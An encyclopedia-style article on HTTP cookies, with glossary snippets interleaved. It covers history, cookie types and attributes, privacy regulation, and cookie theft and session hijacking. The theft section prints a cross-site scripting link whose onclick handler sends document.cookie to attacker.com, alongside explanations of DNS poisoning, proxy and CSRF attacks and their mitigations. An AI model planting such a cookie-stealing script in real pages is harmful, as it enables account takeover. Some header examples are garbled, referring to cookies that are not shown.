HTTP cookie
Encyclopedia
A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is used for an origin website to send state information to a user's browser and for the browser to return the state information to the origin site. The state information can be used for authentication
Authentication
Authentication is the act of confirming the truth of an attribute of a datum or entity...

, identification of a user session, user's preferences, shopping cart
Shopping cart software
Shopping cart software is software used in e-commerce to assist people making purchases online, analogous to the American English term 'shopping cart'...

 contents, or anything else that can be accomplished through storing text data on the user's computer.

Cookies are not software. They cannot be programmed, cannot carry viruses, and cannot install malware on the host computer. However, they can be used by spyware
Spyware
Spyware is a type of malware that can be installed on computers, and which collects small pieces of information about users without their knowledge. The presence of spyware is typically hidden from the user, and can be difficult to detect. Typically, spyware is secretly installed on the user's...

 to track user's browsing activities—a major privacy concern that prompted European and US law makers to take action. Cookies can also be stolen by hackers
Hacker (computer security)
In computer security and everyday language, a hacker is someone who breaks into computers and computer networks. Hackers may be motivated by a multitude of reasons, including profit, protest, or because of the challenge...

 to gain access to a victim's web account.

History

The term "cookie" was derived from "magic cookie
Magic cookie
A magic cookie or just cookie for short, is a token or short packet of data passed between communicating programs, where the data is typically not meaningful to the recipient program. The contents are opaque and not usually interpreted until the recipient passes the cookie data back to the sender...

", which is the packet of data a program receives and sends again unchanged. Magic cookies were already used in computing when computer programmer Lou Montulli
Lou Montulli
Louis J. Montulli II is a programmer who is well known for his work in producing web browsers. In 1991 and 1992 he co-authored a text web browser called Lynx with Michael Grobe and Charles Rezac while he was at the University of Kansas...

 had the idea of using them in Web communications in June 1994. At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for a customer. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart
Shopping cart software
Shopping cart software is software used in e-commerce to assist people making purchases online, analogous to the American English term 'shopping cart'...

.

Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape
Netscape Navigator
Netscape Navigator was a proprietary web browser that was popular in the 1990s. It was the flagship product of the Netscape Communications Corporation and the dominant web browser in terms of usage share, although by 2002 its usage had almost disappeared...

, released on October 13, 1994, supported cookies. The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, and was granted in 1998. Support for cookies was integrated in Internet Explorer in version 2, released in October 1995.

The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of the presence of cookies. The general public learned about them after the Financial Times
Financial Times
The Financial Times is an international business newspaper. It is a morning daily newspaper published in London and printed in 24 cities around the world. Its primary rival is the Wall Street Journal, published in New York City....

published an article about them on February 12, 1996. In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission
Federal Trade Commission
The Federal Trade Commission is an independent agency of the United States government, established in 1914 by the Federal Trade Commission Act...

 hearings in 1996 and 1997.

The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the IETF
Internet Engineering Task Force
The Internet Engineering Task Force develops and promotes Internet standards, cooperating closely with the W3C and ISO/IEC standards bodies and dealing in particular with standards of the TCP/IP and Internet protocol suite...

 was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed by Brian Behlendorf
Brian Behlendorf
Brian Behlendorf is a technologist, computer programmer, and an important figure in the open-source software movement. He was a primary developer of the Apache Web server, the most popular web server software on the Internet, and a founding member of the Apache Group, which later became the Apache...

 and David Kristol respectively, but the group, headed by Kristol himself, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.

At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.

A definitive specification for cookies as used in the real world was published as RFC 6265 in April 2011.

Session cookie

A session cookie only lasts for the duration of users using the website. A web browser normally deletes session cookies when it quits. A session cookie is created when no Expires directive is provided when the cookie is created.

Persistent cookie

A persistent cookie will outlast user sessions. If a persistent cookie has its Max-Age set to 1 year, then, within the year, the initial value set in that cookie would be sent back to the server every time the user visited the server. This could be used to record a vital piece of information such as how the user initially came to this website. For this reason, persistent cookies are also called tracking cookies.

Secure cookie

A secure cookie is only used when a browser is visiting a server via HTTPS, ensuring that the cookie is always encrypted when transmitting from client to server. This makes the cookie less likely to be exposed to cookie theft via eavesdropping.

HttpOnly cookie

The HttpOnly cookie is supported by most modern browsers. On a supported browser, an HttpOnly session cookie will be used only when transmitting HTTP (or HTTPS) requests, thus restricting access from other, non-HTTP APIs (such as JavaScript). This restriction mitigates but does not eliminate the threat of session cookie theft via Cross-site scripting
Cross-site scripting
Cross-site scripting is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same...

. This feature applies only to session-management cookies, and not other browser cookies.

Third-party cookie

First-party cookies are cookies set with the same domain (or its subdomain) in your browser's address bar. Third-party cookies are cookies being set with different domains than the one shown on the address bar (i.e. the web pages on that domain may feature content from a third-party domain - e.g. an advertisement run by www.advexample.com showing advert banners).

For example: Suppose a user visits www.example1.com, which sets a cookie with the domain ad.foxytracking.com. When the user later visits www.example2.com, another cookie is set with the domain ad.foxytracking.com. Eventually, both of these cookies will be sent to the advertiser when loading their ads or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites this advertiser has footprints on.

Supercookie

A "supercookie" is a cookie with a public suffix domain, like .com, .co.uk or k12.ca.us.

Most browsers, by default, allow first-party cookies—a cookie with domain to be the same or sub-domain of the requesting host. For example, a user visiting www.example.com can have a cookie set with domain www.example.com or .example.com, but not .com. A supercookie with domain .com would be blocked by browsers; otherwise, a malicious website, like attacker.com, could set a supercookie with domain .com and potentially disrupt or impersonate legitimate user requests to example.com. The Public Suffix List
Public Suffix List
The Public Suffix List is a catalog of certain Internet domain name suffixes. A "public suffix" is also known by the older term effective top level domain...

 is a cross-vendor initiative to provide an accurate list of domain name suffixes changing. Older versions of browsers may not have the most up-to-date list, and will therefore be vulnerable to certain supercookies.

The term "supercookies" is erroneously used in the media for tracking technologies that do not rely on HTTP cookies. Two such "supercookie" mechanisms were found on Microsoft websites: cookie syncing that respawned MUID cookies, and ETag
HTTP ETag
An ETag, or entity tag, is part of HTTP, the protocol for the World Wide Web. It is one of several mechanisms that HTTP provides for cache validation, and which allows a client to make conditional requests. This allows caches to be more efficient, and saves bandwidth, as a web server does not...

 cookies. Due to media attention, Microsoft later disabled this code:

Zombie cookie

A zombie cookie is any cookie that is automatically recreated after a user has deleted it. This is accomplished by a script storing the content of the cookie in some other locations, such as the local storage available to Flash content, HTML5 storages and other client side mechanisms, and then recreating the cookie from backup stores when the cookie's absence is detected.

Session management

Cookies may be used to maintain data related to the user during navigation, possibly across multiple visits. Cookies were introduced to provide a way to implement a "shopping cart
Shopping cart software
Shopping cart software is software used in e-commerce to assist people making purchases online, analogous to the American English term 'shopping cart'...

" (or "shopping basket"), a virtual device into which users can store items they want to purchase as they navigate throughout the site.

Shopping basket applications today usually store the list of basket contents in a database on the server side, rather than storing basket items in the cookie itself. A web server typically sends a cookie containing a unique session identifier
Unique identifier
With reference to a given set of objects, a unique identifier is any identifier which is guaranteed to be unique among all identifiers used for those objects and for a specific purpose...

. The web browser will send back that session identifier with each subsequent request and shopping basket items are stored associated with a unique session identifier.

Allowing users to log in to a website is a frequent use of cookies. Typically the web server will first send a cookie containing a unique session identifier. Users then submit their credentials and the web application authenticates the session and allows the user access to services.

Personalization

Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future. For example a web server may send a cookie containing the username last used to log in to a web site so that it may be filled in for future visits.

Many websites use cookies for personalization
Personalization
Personalization involves using technology to accommodate the differences between individuals. Once confined mainly to the Web, it is increasingly becoming a factor in education, health care Personalization involves using technology to accommodate the differences between individuals. Once confined...

 based on users' preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page, the server is also sent the cookie where the preferences are stored, and can personalize the page according to the user preferences. For example, the Wikipedia
Wikipedia
Wikipedia is a free, web-based, collaborative, multilingual encyclopedia project supported by the non-profit Wikimedia Foundation. Its 20 million articles have been written collaboratively by volunteers around the world. Almost all of its articles can be edited by anyone with access to the site,...

 website allows authenticated users to choose the webpage skin
Skin (computing)
In computing, a skin is a custom graphical appearance achieved by the use of a graphical user interface that can be applied to specific software and websites to suit the purpose, topic, or tastes of different users....

 they like best; the Google
Google
Google Inc. is an American multinational public corporation invested in Internet search, cloud computing, and advertising technologies. Google hosts and develops a number of Internet-based services and products, and generates profit primarily from advertising through its AdWords program...

 search engine allows users (even non-registered ones) to decide how many search results per page they want to see.

Tracking

Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address
IP address
An Internet Protocol address is a numerical label assigned to each device participating in a computer network that uses the Internet Protocol for communication. An IP address serves two principal functions: host or network interface identification and location addressing...

 of the computer requesting the page or the referrer field of the HTTP request header
Hypertext Transfer Protocol
The Hypertext Transfer Protocol is a networking protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web....

, but cookies allow for greater precision. This can be demonstrated as follows:
  1. If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user; the server creates a random string and sends it as a cookie back to the browser together with the requested page;
  2. From this point on, the cookie will be automatically sent by the browser to the server every time a new page from the site is requested; the server sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.


By looking at the log file, it is then possible to find out which pages the user has visited and in what sequence.

Implementation

Cookies are arbitrary pieces of data chosen by the Web server
Web server
Web server can refer to either the hardware or the software that helps to deliver content that can be accessed through the Internet....

 and sent to the browser. The browser returns them unchanged to the server, introducing a state
State (computer science)
In computer science and automata theory, a state is a unique configuration of information in a program or machine. It is a concept that occasionally extends into some forms of systems programming such as lexers and parsers....

 (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a Web page
Web page
A web page or webpage is a document or information resource that is suitable for the World Wide Web and can be accessed through a web browser and displayed on a monitor or mobile device. This information is usually in HTML or XHTML format, and may provide navigation to other web pages via hypertext...

 or component of a Web page is an isolated event, mostly unrelated to all other views of the pages of the same site. Other than being set by a web server, cookies can also be set by a script in a language such as JavaScript
JavaScript
JavaScript is a prototype-based scripting language that is dynamic, weakly typed and has first-class functions. It is a multi-paradigm language, supporting object-oriented, imperative, and functional programming styles....

, if supported and enabled by the Web browser.

Cookie specifications suggest that browsers should be able to save and send back a minimal number of cookies. In particular, a web browser is expected to be able to store at least 300 cookies of four kilobyte
Kilobyte
The kilobyte is a multiple of the unit byte for digital information. Although the prefix kilo- means 1000, the term kilobyte and symbol KB have historically been used to refer to either 1024 bytes or 1000 bytes, dependent upon context, in the fields of computer science and information...

s each, and at least 20 cookies per server or domain.

Setting a cookie

Transfer of Web pages follows the HyperText Transfer Protocol
Hypertext Transfer Protocol
The Hypertext Transfer Protocol is a networking protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web....

 (HTTP). Regardless of cookies, browsers request a page from web servers by sending them a usually short text called HTTP request
Hypertext Transfer Protocol
The Hypertext Transfer Protocol is a networking protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web....

. For example, to access the page http://www.example.org/index.html, browsers connect to the server www.example.org sending it a request that looks like the following one:


Host: www.example.org




browser
-------→
server


The server replies by sending the requested page preceded by a similar packet of text, called 'HTTP response'
Hypertext Transfer Protocol
The Hypertext Transfer Protocol is a networking protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web....

. This packet may contain lines requesting the browser to store cookies:


Content-type: text/html

Set-Cookie: name=value

Set-Cookie: name2=value2; Expires=Wed, 09 Jun 2021 10:18:14 GMT

 

(content of page)

browser
←-------
server


The server sends lines of Set-Cookie only if the server wishes the browser to store cookies. Set-Cookie is a directive for the browser to store the cookie and send it back in future requests to the server (subject to expiration time or other cookie attributes), if the browser supports cookies and cookies are enabled. For example, the browser requests the page http://www.example.org/spec.html by sending the server www.example.org a request like the following:


Host: www.example.org

Cookie: name=value; name2=value2

Accept: */*

 


browser
-------→
server


This is a request for another page from the same server, and differs from the first one above because it contains the string that the server has previously sent to the browser. This way, the server knows that this request is related to the previous one. The server answers by sending the requested page, possibly adding other cookies as well.

The value of a cookie can be modified by the server by sending a new Set-Cookie: name=newvalue line in response of a page request. The browser then replaces the old value with the new one.

The term "cookie crumb" is sometimes used to refer to the name-value pair. This is not the same as breadcrumb web navigation
Breadcrumb (navigation)
Breadcrumbs or breadcrumb trail is a navigation aid used in user interfaces. It allows users to keep track of their locations within programs or documents. The term comes from the trail of breadcrumbs left by Hansel and Gretel in the popular fairytale....

, which is the technique of showing in each page the list of pages the user has previously visited; this technique, however, may be implemented using cookies.

Cookies can also be set by JavaScript or similar scripts running within the browser. In JavaScript, the object document.cookie is used for this purpose. For example, the instruction document.cookie = "temperature=20" creates a cookie of name temperature and value 20.

Cookie attributes

Besides the name-value pair, servers can also set these cookie attributes: a cookie domain, a path, expiration time or maximum age, secure flag and httponly flag. Browsers will not send cookie attributes back to the server. They will only send the cookie’s name-value pair. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie (name-value pair) to the servers.

Domain and Path

The cookie domain and path define the scope of the cookie—they tell the browser that cookies should only be sent back to the server for the given domain and path. If not specified, they default to the domain and path of the object that was requested. An example of Set-Cookie directives from a website after a user logged in:


Set-Cookie: HSID=AYQEVn….DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-2021 22:23:01 GMT; HttpOnly

Set-Cookie: SSID=Ap4P….GTEq; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; HttpOnly

 ......




The first cookie LSID has default domain docs.foo.com and Path /accounts, which tells the browser to use the cookie only when requesting pages contained in docs.foo.com/accounts. The other 2 cookies HSID and SSID would be sent back by the browser while requesting any subdomain in .foo.com on any path, for example www.foo.com/.

Cookies can be set on only top domain and its sub domains. Setting cookies on www.foo.com from www.bar.com will not work for security reasons.

Expires and Max-Age

The Expires directive tells the browser when to delete the cookie. It is specified in the form of “Wdy, DD-Mon-YYYY HH:MM:SS GMT”, indicating the exact date/time this cookie will expire. As an alternative to setting cookie expiration as an absolute date/time, RFC 6265 allows the use of the Max-Age attribute to set the cookie’s expiration as an interval of seconds in the future, relative to the time the browser received the cookie. An example of Set-Cookie directives from a website after a user logged in:


Set-Cookie: made_write_conn=1295214458; Path=/; Domain=.foo.com

Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01-Jan-1970 00:00:01 GMT; Path=/; Domain=.foo.com; HttpOnly

 ......




The first cookie lu is set to expire sometime in 15-Jan-2013; it will be used by the client browser until that time. The second cookie made_write_conn does not have an expiration date, making it a session cookie. It will be deleted after the user closes his/her browser. The third cookie reg_fb_gate has its value changed to deleted, with an expiration time in the past. The browser will delete this cookie right away – note that cookie will only be deleted when the domain and path attributes in the Set-Cookie field match the values used when the cookie was created.

Secure and HttpOnly

The Secure and HttpOnly attributes do not have associated values. Rather, the presence of the attribute names indicates that the Secure and HttpOnly behaviors are specified.

The Secure attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via secure/encrypted
Https
Hypertext Transfer Protocol Secure is a combination of the Hypertext Transfer Protocol with SSL/TLS protocol to provide encrypted communication and secure identification of a network web server...

 connections. Naturally, web servers should set Secure cookies via secure/encrypted
Https
Hypertext Transfer Protocol Secure is a combination of the Hypertext Transfer Protocol with SSL/TLS protocol to provide encrypted communication and secure identification of a network web server...

 connections, lest the cookie information be transmitted in a way that allows eavesdropping when first sent to the web browser.

The HttpOnly attribute directs browsers to use cookies via the HTTP protocol only. An HttpOnly cookie is not accessible via non-HTTP methods, such as calls via JavaScript (e.g., referencing "document.cookie"), and therefore cannot be stolen easily via cross-site scripting
Cross-site scripting
Cross-site scripting is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same...

 (a pervasive attack technique). As shown in previous examples, both Facebook and Google use the HttpOnly attribute extensively.

Browser settings

Most modern browsers support cookies and allow the user to disable them. The following are common options:
  1. To enable or disable cookies completely, so that they are always accepted or always blocked.
  2. To allow the user to see the cookies that are active with respect to a given page by typing javascript:alert(document.cookie) in the browser URL
    Uniform Resource Locator
    In computing, a uniform resource locator or universal resource locator is a specific character string that constitutes a reference to an Internet resource....

     field. Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.
  3. By default, Internet Explorer allows only third-party cookies that are accompanied by a P3P
    P3P
    The Platform for Privacy Preferences Project, or P3P, is a protocol allowing websites to declare their intended use of information they collect about browsing users...

     "CP" (Compact Policy) field.


Most browsers also allow a full wipe of private data including cookies. Add-on tools for managing cookie permissions also exist.

Privacy and third-party cookies

Cookies have some important implications on the privacy
Privacy
Privacy is the ability of an individual or group to seclude themselves or information about themselves and thereby reveal themselves selectively...

 and anonymity
Anonymity
Anonymity is derived from the Greek word ἀνωνυμία, anonymia, meaning "without a name" or "namelessness". In colloquial use, anonymity typically refers to the state of an individual's personal identity, or personally identifiable information, being publicly unknown.There are many reasons why a...

 of Web users. While cookies are sent only to the server setting them or the server in the same Internet domain, a Web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called third-party cookies. The standards for cookies, RFC 2109 and RFC 2965, specify that browsers should protect user privacy and not allow third-party cookies by default. But most browsers, such as Mozilla Firefox
Mozilla Firefox
Mozilla Firefox is a free and open source web browser descended from the Mozilla Application Suite and managed by Mozilla Corporation. , Firefox is the second most widely used browser, with approximately 25% of worldwide usage share of web browsers...

, Internet Explorer
Internet Explorer
Windows Internet Explorer is a series of graphical web browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems, starting in 1995. It was first released as part of the add-on package Plus! for Windows 95 that year...

, Opera
Opera (web browser)
Opera is a web browser and Internet suite developed by Opera Software with over 200 million users worldwide. The browser handles common Internet-related tasks such as displaying web sites, sending and receiving e-mail messages, managing contacts, chatting on IRC, downloading files via BitTorrent,...

 and Google Chrome
Google Chrome
Google Chrome is a web browser developed by Google that uses the WebKit layout engine. It was first released as a beta version for Microsoft Windows on September 2, 2008, and the public stable release was on December 11, 2008. The name is derived from the graphical user interface frame, or...

 do allow third-party cookies by default, as long as the third-party website has Compact Privacy Policy
P3P
The Platform for Privacy Preferences Project, or P3P, is a protocol allowing websites to declare their intended use of information they collect about browsing users...

 published.
Advertising companies use third-party cookies to track a user across multiple sites. In particular, an advertising company can track a user across all pages where it has placed advertising images or web bug
Web bug
A web bug is an object that is embedded in a web page or e-mail and is usually invisible to the user but allows checking that a user has viewed the page or e-mail. One common use is in e-mail tracking. Alternative names are web beacon, tracking bug, and tag or page tag...

s. Knowledge of the pages visited by a user allows the advertising company to target advertisements to the user's presumed preferences.

Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of such cookie discovery.

The possibility of building a profile of users is considered by some a potential privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.

The United States
United States
The United States of America is a federal constitutional republic comprising fifty states and a federal district...

 government has set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office
Office of National Drug Control Policy
The White House Office of National Drug Control Policy , a former cabinet level component of the Executive Office of the President of the United States, was established in 1989 by the Anti-Drug Abuse Act of 1988...

 used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA
Central Intelligence Agency
The Central Intelligence Agency is a civilian intelligence agency of the United States government. It is an executive agency and reports directly to the Director of National Intelligence, responsible for providing national security intelligence assessment to senior United States policymakers...

 had been leaving persistent cookies on computers which had visited its web site. When notified it was violating policy, CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that the National Security Agency
National Security Agency
The National Security Agency/Central Security Service is a cryptologic intelligence agency of the United States Department of Defense responsible for the collection and analysis of foreign communications and foreign signals intelligence, as well as protecting U.S...

 had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the National Security Agency immediately disabled the cookies.

The 2002 European Union telecommunication privacy Directive contains rules about the use of cookies. In particular, Article 5, Paragraph 3 of this directive mandates that storing data (like cookies) in a user's computer can only be done if:
  1. the user is provided information about how this data is used;
  2. the user is given the possibility of denying this storing operation. However, this article also states that storing data that is necessary for technical reasons is exempted from this rule. This directive was expected to have been applied since October 2003, but a December 2004 report says (page 38) that this provision was not applied in practice, and that some member countries (Slovakia
    Slovakia
    The Slovak Republic is a landlocked state in Central Europe. It has a population of over five million and an area of about . Slovakia is bordered by the Czech Republic and Austria to the west, Poland to the north, Ukraine to the east and Hungary to the south...

    , Latvia
    Latvia
    Latvia , officially the Republic of Latvia , is a country in the Baltic region of Northern Europe. It is bordered to the north by Estonia , to the south by Lithuania , to the east by the Russian Federation , to the southeast by Belarus and shares maritime borders to the west with Sweden...

    , Greece
    Greece
    Greece , officially the Hellenic Republic , and historically Hellas or the Republic of Greece in English, is a country in southeastern Europe....

    , Belgium
    Belgium
    Belgium , officially the Kingdom of Belgium, is a federal state in Western Europe. It is a founding member of the European Union and hosts the EU's headquarters, and those of several other major international organisations such as NATO.Belgium is also a member of, or affiliated to, many...

    , and Luxembourg
    Luxembourg
    Luxembourg , officially the Grand Duchy of Luxembourg , is a landlocked country in western Europe, bordered by Belgium, France, and Germany. It has two principal regions: the Oesling in the North as part of the Ardennes massif, and the Gutland in the south...

    ) did not even implement the provision in national law. The same report suggests a thorough analysis of the situation in the Member States.


The P3P
P3P
The Platform for Privacy Preferences Project, or P3P, is a protocol allowing websites to declare their intended use of information they collect about browsing users...

 specification includes the possibility for a server to state a privacy policy, which specifies which kind of information it collects and for which purpose. These policies include (but are not limited to) the use of information gathered using cookies. According to the P3P specification, a browser can accept or reject cookies by comparing the privacy policy with the stored user preferences or ask the user, presenting them the privacy policy as declared by the server.

Many web browsers including Apple's Safari and Microsoft Internet Explorer versions 6 and 7 support P3P which allows the web browser to determine whether to allow third-party cookies to be stored. The Opera web browser allows users to refuse third-party cookies and to create global and specific security profiles for Internet domains. Firefox 2.x dropped this option from its menu system but it restored it with the release of version 3.x.

Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's Web experience. Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.

Cookie theft and session hijacking

Most web sites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a web site uses cookies as session identifiers, attackers can impersonate users’ requests by stealing a full set of victims’ cookies. From the web server's point of view, a request from an attacker has the same authentication as the victim’s requests; thus the request is performed on behalf of the victim’s session.

Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) which work with web sites which rely solely on HTTP cookies for user identification.

Network eavesdropping

Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over unencrypted
Plaintext
In cryptography, plaintext is information a sender wishes to transmit to a receiver. Cleartext is often used as a synonym. Before the computer era, plaintext most commonly meant message text in the language of the communicating parties....

 open Wi-Fi
Wi-Fi
Wi-Fi or Wifi, is a mechanism for wirelessly connecting electronic devices. A device enabled with Wi-Fi, such as a personal computer, video game console, smartphone, or digital audio player, can connect to the Internet via a wireless network access point. An access point has a range of about 20...

). This traffic includes cookies sent on ordinary unencrypted HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations.

An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim’s bank account.

This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security
Transport Layer Security
Transport Layer Security and its predecessor, Secure Sockets Layer , are cryptographic protocols that provide communication security over the Internet...

 (HTTPS
Https
Hypertext Transfer Protocol Secure is a combination of the Hypertext Transfer Protocol with SSL/TLS protocol to provide encrypted communication and secure identification of a network web server...

 protocol) to encrypt the connection. A server can specify the Secure flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as an SSL connection.

Publishing false sub-domain – DNS cache poisoning

Via DNS cache poisoning
DNS cache poisoning
DNS cache poisoning is a security or data integrity compromise in the Domain Name System . The compromise occurs when data is introduced into a DNS name server's cache database that did not originate from authoritative DNS sources. It may be a deliberate attempt of a maliciously crafted attack on a...

, an attacker might be able to cause a DNS server to cache a fabricated DNS entry, say f12345.www.example.com with the attacker’s server IP address. The attacker can then post an image URL from his own server (for example, http://f12345.www.example.com/img_4_cookie.jpg). Victims reading the attacker’s message would download this image from f12345.www.example.com. Since f12345.www.example.com is a sub-domain of www.example.com, victims’ browsers would submit all example.com-related cookies to the attacker’s server; the compromised cookies would also include HttpOnly cookies.

This vulnerability is usually for Internet Service Provider
Internet service provider
An Internet service provider is a company that provides access to the Internet. Access ISPs directly connect customers to the Internet using copper wires, wireless or fiber-optic connections. Hosting ISPs lease server space for smaller businesses and host other people servers...

s to fix, by securing their DNS servers. But it can also be mitigated if www.example.com is using Secure cookies. Victims’ browsers will not submit Secure cookies if the attacker’s image is not using encrypted connections. If the attacker chose to use HTTPS
Https
Hypertext Transfer Protocol Secure is a combination of the Hypertext Transfer Protocol with SSL/TLS protocol to provide encrypted communication and secure identification of a network web server...

 for his img_4_cookie.jpg download, he would have the challenge of obtaining an SSL certificate for f12345.www.example.com from a Certificate Authority
Certificate authority
In cryptography, a certificate authority, or certification authority, is an entity that issues digital certificates. The digital certificate certifies the ownership of a public key by the named subject of the certificate...

. Without a proper SSL certificate, victims’ browsers would display (usually very visible) warning messages about the invalid certificate, thus alerting victims as well as security officials from www.example.com.

Cross-site scripting – cookie theft

Scripting languages such as JavaScript
JavaScript
JavaScript is a prototype-based scripting language that is dynamic, weakly typed and has first-class functions. It is a multi-paradigm language, supporting object-oriented, imperative, and functional programming styles....

 and JScript
JScript
JScript is a scripting language based on the ECMAScript standard that is used in Microsoft's Internet Explorer.JScript is implemented as a Windows Script engine. This means that it can be "plugged in" to any application that supports Windows Script, such as Internet Explorer, Active Server Pages,...

 are usually allowed to access cookie values and have some means to send arbitrary values to arbitrary servers on the Internet. These facts are used in combination with sites allowing users to post HTML content that other users can see.

As an example, an attacker may post a message on www.example.com with the following link:

onclick="window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie);
return false;">
Click here!


When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document.cookie with the list of cookies of the user that are active for the page. As a result, this list of cookies is sent to the attacker.com server. If the attacker’s posting is on https://www.example.com/somewhere, secure cookies will also be sent to attacker.com in plain text.

Cross-site scripting is a constant threat, as there are always some crackers trying to find a way of slipping in script tags to websites. It is the responsibility of the website developers to filter out such malicious code.

In the meantime, such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client side script, and therefore the attacker will not be able to gather these cookies.

Cross-site scripting

If an attacker was able to insert a piece of script to a page on www.example.com, and a victim’s browser was able to execute the script, the script could simply carry out the attack. This attack would use victim’s browser to send HTTP requests to servers directly; therefore, the victim’s browser would submit all relevant cookies, including HttpOnly cookies, as well as Secure cookies if the script request is on HTTPS
Https
Hypertext Transfer Protocol Secure is a combination of the Hypertext Transfer Protocol with SSL/TLS protocol to provide encrypted communication and secure identification of a network web server...

.

For example, on MySpace, Samy posted a short message “Samy is my hero” on his profile, with a hidden script to send Samy a “friend request” and then post the same message on the victim’s profile. A user reading Samy’s profile would send Samy a “friend request” and post the same message on this person’s profile. Then, the third person reading the second person’s profile would do the same. Pretty soon, this Samy worm became one of the fastest spreading viruses of all time.

This type of attack (with automated scripts) would not work if a website had CAPTCHA
CAPTCHA
A CAPTCHA is a type of challenge-response test used in computing as an attempt to ensure that the response is generated by a person. The process usually involves one computer asking a user to complete a simple test which the computer is able to generate and grade...

 to challenge client requests.

Cross-site scripting – proxy request

In older version of browsers, there were security holes allowing attackers to script a proxy request by using XMLHttpRequest
XMLHttpRequest
XMLHttpRequest is an API available in web browser scripting languages such as JavaScript. It is used to send HTTP or HTTPS requests directly to a web server and load the server response data directly back into the script. The data might be received from the server as XML text or as plain text...

. For example, a victim is reading an attacker’s posting on www.example.com, and the attacker’s script is executed in the victim’s browser. The script generates a request to www.example.com with the proxy server attacker.com. Since the request is for www.example.com, all example.com cookies will be sent along with the request, but routed through the attacker’s proxy server, hence, the attacker can harvest victim’s cookies.

This attack would not work for Secure cookie, since Secure cookies go with HTTPS
Https
Hypertext Transfer Protocol Secure is a combination of the Hypertext Transfer Protocol with SSL/TLS protocol to provide encrypted communication and secure identification of a network web server...

 connections, and its protocol dictates end-to-end encryption, i.e., the information is encrypted on the user’s browser and decrypted on the destination server www.example.com, so the proxy servers would only see encrypted bits and bytes.

Cross-site Request Forgery

For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,



If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.

Drawbacks of cookies

Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer
(REST
Representational State Transfer
Representational state transfer is a style of software architecture for distributed hypermedia systems such as the World Wide Web. The term representational state transfer was introduced and defined in 2000 by Roy Fielding in his doctoral dissertation...

) software architectural style.

Inaccurate identification

If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence cookies do not identify a person, but a combination of a user account, a computer, and a Web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.

